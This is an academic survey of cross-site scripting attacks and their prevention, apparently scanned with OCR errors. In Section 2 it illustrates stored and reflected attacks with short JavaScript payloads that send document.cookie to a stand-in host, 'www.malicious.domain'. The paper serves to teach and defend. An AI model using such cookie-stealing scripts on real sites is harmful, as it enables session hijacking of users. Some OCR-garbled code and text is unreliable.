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Abstract. Web applications are becoming truly pervasive in all kinds of business 
models and organizations. Today, most critical systems such as those related to 
health care, banking, or even emergency response, are relying on these applica- 
tions. They must therefore include, in addition to the expected value offered to 
their users, reliable mechanisms to ensure their security. In this paper, we focus 
on the specific problem of cross-site scripting attacks against web applications. 
We present a study of this kind of attacks, and survey current approaches for 
their prevention. Applicability and limitations of each proposal are also dis- 
cussed. 
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1 Introduction 

The use of the web paradigm is becoming an emerging strategy for application 
software companies [9]. It allows the design of pervasive applications which can 
be potentially used by thousands of customers from simple web clients. More- 
over, the existence of new technologies for the improvement of web features 
(e.g., Ajax [10]) allows software engineers the conception of new tools which 
are not longer restricted to specific operating systems (such as web based docu- 
ment processors [12], social network services [13], collaborative encyclopedias 
[40] and weblogs [41]). 

However, the inclusion of effective security mechanisms on those web ap- 
plications is an increasing concern [39]. Besides the expected value that the 
applications are offering to their potential users, reliable mechanisms for the 
protection of those data and resources associated to the web application should 
also be offered. Existing approaches to secure traditional applications are not 
always sufficient when addressing the web paradigm and often leave end users 



responsible for the protection of key aspects of a service. This situation must be 
avoided since, if not well managed, it could allow inappropriate uses of a web 
application and lead to a violation of its security requirements. 

We focus in this paper on the specific case of Cross-Site Scripting attacks 
(XSS attacks for short) against the security of web applications. This attack re- 
lays on the injection of a malicious code into a web application, in order to 
compromise the trust relationship between a user and the web application's site. 
If the vulnerability is successfully exploited, the malicious user who injected 
the code may then bypass, for instance, those controls that guarantee the pri- 
vacy of its users, or even the integrity of the application itself. There exist in 
the literature different types of XSS attacks and possible exploitable scenarios. 
We survey in this paper the two most representative XSS attacks that can actu- 
ally affect current web applications, and we discuss existing approaches for its 
prevention, such as filtering of web content, analysis of scripts and runtime en- 
forcement of web browsers. Some alternative categorizations, both of the types 
of XSS attacks and of the prevention mechanisms, may be found in [14]. We 
discuss these approaches and their limitations, as well as their deployment and 
applicability. 

The rest of this paper is organized as follows. In Section 2 we further present 
our motivation problem and show some representative examples. We then sur- 
vey in Section 3 related solutions and overview their main drawbacks. Finally, 
Section 4 closes the paper with a list of conclusions. 

2 Cross-Site Scripting Attacks 

Cross-Site Scripting attacks (XSS attacks for short) are those attacks against 
web applications in which an attacker gets control of a user's browser in order 
to execute a malicious script (usually an HTML/JavaScript code) within the con- 
text of trust of the web application's site. As a result, and if the embedded code 
is successfully executed, the attacker might then be able to access, passively 
or actively, to any sensitive browser resource associated to the web application 
(e.g., cookies, session IDs, etc.). We study in the sequel two main types of XSS 
attacks: persistent and non-persistent XSS attacks (also referred in the literature 
as stored and reflected XSS attacks). 

2.1 Persistent XSS Attacks 

Before going further in this section, let us first introduce the former type of at- 
tack by using the sample scenario shown in Figure 2. We can notice in such an 
example the following elements: attacker (A), set of victim's browsers (V), vul- 
nerable web application (VWA), malicious web application (MWA), trusted 



domain (TD), and malicious domain (M D). We split out the whole attack in 
two main stages. In the first stage (cf. Figure 2, steps 1^1), user A (attacker) reg- 
isters itself into VWA's application, and posts the following HTML/JavaScript 
code as message Ma'- 



<HTML> 

< title > Welcome! </title> 

Hi everybody! See that picture below, that's my city, well where I come from ...<BR> 

<img src= "city.jpg "> 

<script> 

document. images[0].src= "http://www.malicious.domain/city.jpg?stolencookies= " +document. cookie; 

</script> 

</HTML> 



Fig. 1. Content of message Ma- 

The complete HTML/JavaScript code within message Ma is then stored 
into VWA's repository (cf. Figure 1, step 4) at TD (trusted domain), and keeps 
ready to be displayed by any other VWA's user. Then, in a second stage (cf. 
Figure 2, steps 5j-12j), and for each victim V{ E V that displays message Ma, 
the associated cookie Vi_id stored within the browser's cookie repository of 
each victim vi, and requested from the trust context (TD) of VWA, is sent out 
to an external repository of stolen cookies located at MD (malicious domain). 
The information stored within this repository of stolen cookies may finally be 
utilized by the attacker to get into VWA by using other user's identities. 

As we can notice in the previous example, the malicious JavaScript code 
injected by the attacker into the web application is persistently stored into the 
application's data repository. In turn, when an application's user loads the mali- 
cious code into its browser, and since the code in sent out from the trust context 
of the application's web site, the user's browser allows the script to access its 
repository of cookies. Thus, the script is allowed to steal victim's sensitive in- 
formation to the malicious context of the attacker, and circumventing in this 
manner the basic security policy of any JavaScript engine which restricts the 
access of data to only those scripts that belong to the same origin where the 
information was set up [7]. 

The use of the previous technique is not only restricted to the stealing of 
browser's data resources. We can imagine an extended JavaScript code in the 
message injected by the attacker which simulates, for instance, the logout of 
the user from the application's web site, and that presents a false login form, 
which is going to store into the malicious context of the attacker the victim's 
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Fig. 2. Persistent XSS attack sample scenario. 



credentials (such as login, password, secret questions/answers, and so on). Once 
gathered the information, the script can redirect again the flow of the application 
into the previous state, or to use the stolen information to perform a legitimate 
login into the application's web site. 

Persistent XSS attacks are traditionally associated to message boards web 
applications with weak input validation mechanisms. Some well known real 
examples of persistent XSS attacks associated to such kind of applications can 
be found in [43, 35, 36]. On October 2001, for example, a persistent XSS attack 
against Hotmail [26] was found [43]. In such an attack, and by using a similar 
technique as the one shown in Figure 2, the remote attacker was allowed to 
steal .NET Passport identifiers of Hotmail's users by collecting their associated 
browser's cookies. Similarly, on October 2005, a well known persistent XSS 
attack which affected the online social network My Space [27], was utilized by 
the worm Samy [35, 1] to propagate itself across MySpace's user profiles. More 
recently, on November 2006, a new online social network operated by Google, 
Orkut [13], was also affected by a similar persistent XSS attack. As reported 
in [36], Orkut was vulnerable to cookie stealing by simply posting the stealing 
script into the attacker's profile. Then, any other user viewing the attacker's 
profile was exposed and its communities transferred to the attacker's account. 



2.2 Non-Persistent XSS Attacks 



We survey in this section a variation of the basic XSS attack described in the 
previous section. This second category, denned in this paper as non-persistent 
XSS attack (and also referred in the literature as reflected XSS attack), exploits 
the vulnerability that appears in a web application when it utilizes information 
provided by the user in order to generate an outgoing page for that user. In this 
manner, and instead of storing the malicious code embedded into a message by 
the attacker, here the malicious code itself is directly reflected back to the user 
by means of a third party mechanism. By using a spoofed email, for instance, the 
attacker can trick the victim to click a link which contains the malicious code. 
If so, that code is finally sent back to the user but from the trusted context of the 
application's web site. Then, similarly to the attack scenario shown in Figure 2, 
the victim's browser executes the code within the application's trust domain, 
and may allow it to send associated information (e.g., cookies and session IDs) 
without violating the same origin policy of the browser's interpreter [34]. 
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Fig. 3. Non-persistent XSS attack sample scenario. 



Non-persistent XSS attacks is by far the most common type of XSS at- 
tacks against current web applications, and is commonly combined together 
with other techniques, such as phishing and social engineering [20], in order 
to achieve its objectives (e.g., steal user's sensitive information, such as credit 



card numbers). Because of the nature of this variant, i.e., the fact that the code is 
not persistently stored into the application's web site and the necessity of third 
party techniques, non-persistent XSS attacks are often performed by skilled at- 
tackers and associated to fraud attacks. The damage caused by these attacks can 
indeed be pretty important. 

We show in Figure 3 a sample scenario of a non-persistent XSS attack. We 
preserve in this second example the same elements we presented in the previ- 
ous section, i.e., an attacker (A), a set of victim's browsers (V), a vulnerable 
web application (VW-A), a malicious web application (MWA), a trusted do- 
main (TD), and a malicious domain (M D). We can also divide in this second 
scenario two main stages. In the first stage (cf. Figure 3, steps 1^—2^), user v% 
is somehow convinced (e.g., by a previous phishing attack through a spoofed 
email) to browse into MWA, and he is then tricked to click into the link em- 
bedded within the following HTML/JavaScript code: 



<HTML> 

< title > Welcome! </title> 

Click into the following <a href= 'http://www.trusted.domainfVWAJ <script>\ 

document. location='littp://www.malicious.domain/city.jpg?stolencookies=" J rdocument.cookie;\ 

</script> '>link</a>. 

</HTML> 



When user Vi clicks into the link, its browser is redirected to VWA, re- 
questing a page which does not exist at TD and, then, the web server at TD 
generates an outcoming error page notifying that the resource does not exist. Let 
us assume however that, because of a non-persistent XSS vulnerability within 
VWA, TD's web server decides to return the error message embedded within 
an HTML/JavaScript document, and that it also includes in such a document the 
requested location, i.e., the malicious code, without encoding it . In that case, 
let us assume that instead of embedding the following code: 

<script>document.location= "hitp:/Avww. malicious, domain/city.jpg ?\ 
stolencookies— "■¥ document, cookie; </script> 

it embeds the following one: 

<script>document.location= "http://www.malicious.domairi/city.jpg?\ 
stolencookies= "+document.cookie;</script> 

3 A transformation process can be used in order to slightly minimize the odds of an attack, 
by simply replacing some special characters that can be further used by the attacker to harm the 
web application (for instance, replacing characters < and > by &ilt; and <kgt\). 



If such a situation happens, Vi's browsers will execute the previous code 
within the trust context of VWA at TD's site and, therefore, that cookie be- 
longing to TD will be send to the repository of stolen cookies of MWA at 
MD (cf. Figure 3, steps 3j-6j). The information stored within this repository 
can finally be utilized by the attacker to get into VWA by using v^'s identity. 

The example shown above is inspired by real-world scenarios, such as those 
attacks reported in [6, 16, 28, 29]. In [6, 16], for instance, the authors reported on 
November 2005 and July 2006 some non-persistent XSS vulnerabilities in the 
Google's web search engine. Although those vulnerabilities were fixed in a rea- 
sonable short time, it shows how a unstable web application like the Google's 
web search engine had been allowing attackers to inject in its search results 
malicious versions of legitimate pages in order to steal sensitive information 
trough non-persistent XSS attacks. The author in [28, 29] even go further when 
claiming in June/July 2006 that the e-payment web application PayPal [32] had 
probably been allowing attackers to steal sensitive data (e.g., credit card num- 
bers) from its members during more than two years until Paypal's developers 
fixed the XSS vulnerability. 

3 Prevention Techniques 

Although web application's development has efficiently evolved since the first 
cases of XSS attacks were reported, such attacks are still being exploited day 
after day. Since late 90's, attackers have managed to continue exploiting XSS 
attacks across Internet web applications although they were protected by tradi- 
tional network security techniques, like firewalls and cryptography-based mech- 
anisms. The use of specific secure development techniques can help to mitigate 
the problem. However, they are not always enough. For instance, the use of se- 
cure coding practices (e.g., those proposed in [18]) and/or secure programming 
models (e.g., the model proposed in [11] to detect anomalous executing situa- 
tions) are often limited to traditional applications, and might not be useful when 
addressing the web paradigm. Furthermore, general mechanisms for input val- 
idation are often focused on numeric information or bounding checkins (e.g., 
proposals presented in [24, 8]), while the prevention of XSS attacks should also 
address validation of input strings. 

This situation shows the inadequacy of using basic security recommenda- 
tions as single measures to guarantee the security of web applications, and leads 
to the necessity of additional security mechanisms to cope with XSS attacks 
when those basic security measures have been evaded. We present in this sec- 
tion specific approaches intended for the detection and prevention of XSS at- 
tacks. We have structured the presentation of these approaches on two main 



categories: analysis and filtering of the exchanged information; and runtime en- 
forcement of web browsers. 

3.1 Analysis and Filtering of the Exchanged Information 

Most, if not all, current web applications which allow the use of rich content 
when exchanging information between the browser and the web site, imple- 
ment basic content filtering schemes in order to solve both persistent and non- 
persistent XSS attacks. This basic filtering can easily be implemented by defin- 
ing a list of accepted characters and/or special tags and, then, the filtering pro- 
cess simply rejects everything not included in such a list. Alternatively, and in 
order to improve the filtering process, encoding processes can also be used to 
make those blacklisted characters and/or tags less harmful. However, we con- 
sider that these basic strategies are too limited, and easily to evade by skilled 
attackers [17]. 

The use of policy-based strategies has also been reported in the literature. 
For instance, the authors in [37] propose a proxy server intended to be placed 
at the web application's site in order to filter both incoming and outcoming data 
streams. Their filtering process takes into account a set of policy rules defined 
by the web application's developers. Although their technique presents an im- 
portant improvement over those basic mechanisms pointed out above, this ap- 
proach still presents important limitations. We believe that their lack of analysis 
over syntactical structures may be used by skilled attackers in order to evade 
their detection mechanisms and hit malicious queries. The simple use of regular 
expression can clearly be used to avoid those filters. Second, the semantics of 
the policy language proposed in their work is not clearly reported and, to our 
knowledge, its use for the definition of general filtering rules for any possible 
pair of application/browser seems non-trivial and probably an error-prone task. 
Third, the placement of the filtering proxy at the server side can quickly intro- 
duce performance and scalabity limitations for the application's deployment. 

More recent server-based filtering proxies for similar purposes have also 
been reported in [33, 38]. In [33], a filtering proxy is intended to be placed at 
the server-side of a web application in order to differentiate trusted and untrusted 
traffic into separated channels. To do so, the authors propose a fine-grained taint 
analysis to perform the partitioning process. They present, moreover, how they 
accomplish their proposal by manually modifying a PHP interpreter at the server 
side to track information that has previously been tainted for each string data. 
The main limitation of this approach is that any web application implemented 
with a different language cannot be protected by their approach, or will require 
the use of third party tools, e.g., language wrappers. The proposed technique 
depends so of its runtime environment, which clearly affects to its portability. 



The management of this proposal continues moreover being non-trivial for any 
possible pair of application/browser and potentially error-prone. Similarly, the 
authors in [38] propose a syntactic criterion to filter out malicious data streams. 
Their solution efficiently analyzes queries and detect misuses, by wrapping the 
malicious statement to avoid the final stage of an attack. The authors imple- 
mented and conducted, moreover, experiments with five real world scenarios, 
avoiding in all of them the malicious content and without generating any false 
positive. The goal of their approach seems however targeted for helping pro- 
grammers, in order to circumvent vulnerabilities at the server side since early 
stages, rather than for client-side protection. Furthermore, this approach contin- 
ues presenting language dependency and its management does not seem, at the 
moment, a trivial task. 

Similar solutions also propose the inclusion of those filtering and/or analysis 
processes at client-side, such as [23, 19]. In [23], on the one hand, a client-side 
filtering method is proposed for the prevention of XSS attacks by preventing 
victim's browsers to contact malicious URLs. In such an approach, the authors 
differentiate good and bad URLs by blacklisting links embedded within the web 
application's pages. In this manner, the redirection to URLs associated to those 
blacklisted links are rejected by the client-side proxy. We consider this method 
is not enough to neither detect nor prevent complex XSS attacks. Only basic 
XSS attacks based on same origin violation [34] might be detected by using 
blacklisting methods. Alternative XSS techniques, as the one proposed in [1, 
35], or any other vulnerability not due to input validation, may be used in order 
to circumvent such a prevention mechanism. The authors in [19], on the other 
hand, present another client-based proxy that performs an analysis process of the 
exchanged data between browser and web application's server. Their analysis 
process is intended to detect malicious requests reflected from the attacker to 
victim (e.g., non-persistent XSS attack scenario presented in Section 2.2). If a 
malicious request is detected, the characters of such a request are re-encoded by 
the proxy, trying to avoid the success of the attack. Clearly, the main limitation 
of such an approach is that it can only be used to prevent non-persistent XSS 
attacks; and similarly to the previous approach, it only addresses attacks based 
on HTML/JavaScript technologies. 

To sum up, we consider that although filtering- and analysis-based proposals 
are the standard defense mechanism and the most deployed technique until the 
moment, they present important limitations for the detection and prevention of 
complex XSS attacks on current web applications. Even if we agree that those 
filtering and analysis mechanisms can theoretically be proposed as an easy task, 
we consider however that its deployment is very complicated in practice (spe- 
cially, on those applications with high client-side processing like, for instance, 



Ajax based applications [10]). First, the use both filtering and analysis proxies, 
specially at the server side, introduces important limitations regarding the per- 
formance and scalability of a given web application. Second, malicious scripts 
might be embedded within the exchanged documents in a very obfuscated shape 
(e.g., by encoding the malicious code in hexadecimal or more advanced encod- 
ing methods) in order to appear less suspicious to those filters/analyzers. Finally, 
even if most of well-known XSS attacks are written in JavaScript and embedded 
into HTML documents, other technologies, such as Java, Flash, ActiveX, and so 
on, can also be used [31]. For this reason, it seems very complicated to us the 
conception of a general filtering- and/or analysis-based process able to cope any 
possible misuses of such languages. 

3.2 Runtime Enforcement of Web Browsers 

Alternative proposals to the analysis and filtering of web content on either server- 
or client-based proxies, such as [15, 22, 21], try to eliminate the need for inter- 
mediate elements by proposing strategies for the enforcement of the runtime 
context of the end-point, i.e., the web browser. 

In [15], for example, the authors propose an auditing system for the Java- 
Script's interpreter of the web browser Mozilla. Their auditing system is based 
on an intrusion detection system which detects misuses during the execution of 
JavaScript operations, and to take proper counter-measures to avoid violations 
against the browser's security (e.g., an XSS attack). The main idea behind their 
approach is the detection of situations where the execution of a script written in 
JavaScript involves the abuse of browser resources, e.g., the transfer of cookies 
associated to the web application's site to untrusted parties — violating, in this 
manner, the same origin policy of a web browser. The authors present in their 
work the implementation of this approach and evaluate the overhead introduced 
to the browser's interpreter. Such an overhead seems to highly increase as well 
as the number of operations of the script also do. For this reason, we can notice 
scalability limitations of this approach when analyzing non-trivial JavaScript 
based routines. Moreover, their approach can only be applied for the prevention 
of JavaScript based XSS attacks. To our knowledge, not further development 
has been addressed by the authors in order to manage the auditing of different 
interpreters, such as Java, Flash, etc. 

A different approach to perform the auditing of code execution to ensure that 
the browser's resources are not going to be abused is the use of taint checking. 
An enhanced version of the JavaScript interpreter of the web browser Mozilla 
that applies taint checking can be found in [22]. Their checking approach is in 
the same line that those audit processes pointed out in the previous section for 
the analysis of script executions at the server side (e.g., at the web application's 



site or in an intermediate proxy), such as [37, 30, 42]. Similarly to the work pre- 
sented in [15], but without the use of intrusion detection techniques, the proposal 
introduced in [22] presents the use of a dynamic analysis of JavaScript code, per- 
formed by the browser's JavaScript interpreter, and based on taint checking, in 
order to detect whether browser's resources (e.g., session identifiers and cook- 
ies) are going to be transferred to an untrusted third party (i.e., the attacker's 
domain). If such a situation is detected, the user is warned and he might decide 
whether the transfer should be accepted or refused. 

Although the basic idea behind this last proposal is sound, we can notice 
however important drawbacks. First, the protection implemented in the browser 
adds an additional layer of security under the final decision of the end user. Un- 
fortunately, most of web application's users are not always aware of the risks 
we are surveying in this paper, and are probably going to automatically accept 
the transfer requested by the browser. A second limitation we notice in this pro- 
posal is that it can not ensure that all the information flowing dynamically is 
going to be audited. To solve this situation, the authors in [22] have to comple- 
ment their dynamic approach together with an static analysis which is invoked 
each time that they detect that the dynamic analysis is not enough. Practically 
speaking, this limitation leads to scalability constraints in their approach when 
analyzing medium and large size scripts. It is therefore fair to conclude that is 
their static analysis which is going to decide the effectiveness and performance 
of their approach, which we consider too expensive when handling our moti- 
vation problem. Furthermore, and similarly to most of the proposals reported 
in the literature, this new proposal still continues addressing the single case of 
JavaScript based XSS attacks, although many other languages, such as Java, 
Flash, ActiveX, and so on, should also be considered. 

A third approach to enforce web browsers against XSS attacks is presented 
in [21], in which the authors propose a policy-based management where a list 
of actions (e.g., either accept or refuse a given script) is embedded within the 
documents exchanged between server and client. By following this set of ac- 
tions, the browser can later decide, for instance, whether a script should either 
be executed or refused by the browser's interpreter, or if a browser's resource 
can or cannot be manipulated by a further script. As pointed out by the authors 
in [21], their proposal present some analogies to host-based intrusion detection 
techniques, not just for the sake of executing a local monitor which detects pro- 
gram misuses, but more important, because it uses a definition of allowable be- 
haviors by using whitelisted scripts and sandboxes. However, we conceive that 
their approach tends to be too restrictive, specially when using their proposal 
for isolating browser's resources by using sandboxes — wich we consider that 
can directly or indirectly affect to different portions of a same document, and 



clearly affect the proper usability of the application. We also conceive a lack of 
semantics in the policy language presented in [21], as well as in the mechanism 
proposed for the exchange of policies. 

3.3 Summary and comments on current prevention techniques 

We consider that the surveyed proposals are not mature enough and should still 
evolve in order to properly manage our problem domain. We believe moreover 
that it is necessary to manage an agreement between both server- and browser- 
based solutions in order to efficiently circumvent the risk of XSS on current 
web applications. Even if we are willing to accept that the enforcement of web 
browsers present clear advantages compared with either server- or client-based 
proxy solutions (e.g., bottleneck and scalability situations when both analysis 
and filtering of the exchanged information is performed by an intermediate 
proxy in either the server or the client side), we consider that the set of ac- 
tions which should finally be enforced by the browser must clearly be defined 
and specified from the server side, and later be enforced by the client side (i.e., 
deployed from the web server and enforced by the web browser). Some addi- 
tional managements, like the authentication of both sides before the exchanged 
of policies and the set of mechanisms for the protection of resources at the client 
side should also be considered. We are indeed working on this direction, in or- 
der to conceive and deploy a policy-based enforcement of web browsers using 
XACML policies specified at the server side, and exchanged between client and 
server through X.509 certificates and the SSL protocol. Due to space limitation, 
we do not cover in the paper this work. However, a technical report regarding 
its design and key points is going to be published soon. 

4 Conclusion 

The increasing use of the web paradigm for the development of pervasive appli- 
cations is opening new security threats against the infrastructures behind such 
applications. Web application's developers must consider the use of support 
tools to guarantee a deploymet free of vulnerabilities, such as secure coding 
practices [18], secure programming models [11] and, specially, construction 
frameworks for the deployment of secure web applications [25]. However, at- 
tackers continue managing new strategies to exploit web applications. The sig- 
nificance of such attacks can be seen by the pervasive presence of those web 
applications in, for instance, important critical systems in industries such as 
health care, banking, government administration, and so on. 

In this paper, we have studied a specific case of attack against web appli- 
cations. We have seen how the existence of cross-site scripting (XSS for short) 



vulnerabilities on web application can involve a great risk for both the applica- 
tion itself and its users. We have also surveyed existing approaches for the pre- 
vention of XSS attacks on vulnerable applications, discussing their benefits and 
drawbacks. Whether dealing with persistent or non-persistent XSS attacks, there 
are currently very interesting solutions which provide interesting approaches to 
solve the problem. But these solutions present some failures, some do not pro- 
vide enough security and can be easily bypassed, others are so complex that 
become impractical in real situations. 
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